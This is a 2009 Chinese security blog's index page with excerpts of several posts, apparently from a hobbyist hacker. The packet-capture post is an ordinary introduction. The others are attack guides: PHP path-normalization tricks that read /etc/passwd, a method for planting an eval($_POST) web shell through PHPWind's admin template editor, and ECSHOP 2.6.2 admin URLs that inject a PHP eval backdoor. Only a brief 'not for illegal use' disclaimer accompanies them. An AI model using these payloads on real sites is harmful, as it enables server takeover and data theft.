自定义模块
从抓包到嗅探
2009-4-16 9:52:14 阅读332 评论0 162009/04 Apr16
文章来源:http://piao2010.com 性质:原创
此文是我的计算机网络课作业,拿出来凑凑数。
第一次接触“抓包”这个词应该是在高一的时候,当时刚刚迷上网络安全,经常从《黑客X档案》中看见一些利用抓包技术入侵的文章,最常用的工具就是WsockExpert,同时它也是我接触的第一个抓包工具。WsockExpert可以用来监视和截获指定进程网络数据的传输,修改网络发送和接收数据,并用NC(NetCa
php文件系统攻击向导
2009-4-12 15:47:55 阅读324 评论0 122009/04 Apr12
一.php文件系统路径正常化攻击
在路径中使用/和/.会使/etc/passwd/或者/etc/passwd/.作为一个文件被打开.
二.php文件系统过程路径截断攻击
PHP有一个路径截断的问题(一个非常邪恶的手段snprintf())只允许使用MAX_PATH被作为打开文件或者目录的鉴定.
三.php文件系统过程路径正常化攻击例子
$ php -r 'include("/etc/passwd");' | head -n1
root:x:0:0:root:/root:/bin/bash
一会我们应该知道某个路径正常化为标准
$ cat /etc//passwd | head -n1
phpwin后台拿shell的方法
2009-4-11 12:20:11 阅读230 评论0 112009/04 Apr11
方式1 模板法
进入后台, 风格模版设置 ,在随便一行写代码
记住,这代码必须顶着左边行写,代码前面不可以有任何字符。
EOT;
eval($a);
print <<
例如,我写完某一行为。
.headurl { color:#ffffff;}
EOT;
eval($_POST[’a’]);
print <<.index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;}
而后得到一个shell
ECSHOP2.6.2后台拿WEBSHELL
2009-4-11 12:15:31 阅读375 评论0 112009/04 Apr11
请勿用于非法用途
利用方法:
http://www.xx. com/admin/integrate.php?act=sync&del_list=<?php%20eval($_POST[cmd])?>
htp://www.xx. com/admin/integrate.php?act=sync&rename_list=<?php%20eval($_POST[cmd])?>
http://www.xx .com/admin/integrate.php?act=sync&ignore_list=<?php%20eval($_POST[cmd])?>
浙江省 杭州市 金牛座
发消息 写留言
| 博客等级 | 加载中... |
| 今日访问 | 加载中... |
| 总访问量 | 加载中... |
| 最后登录 | 加载中... |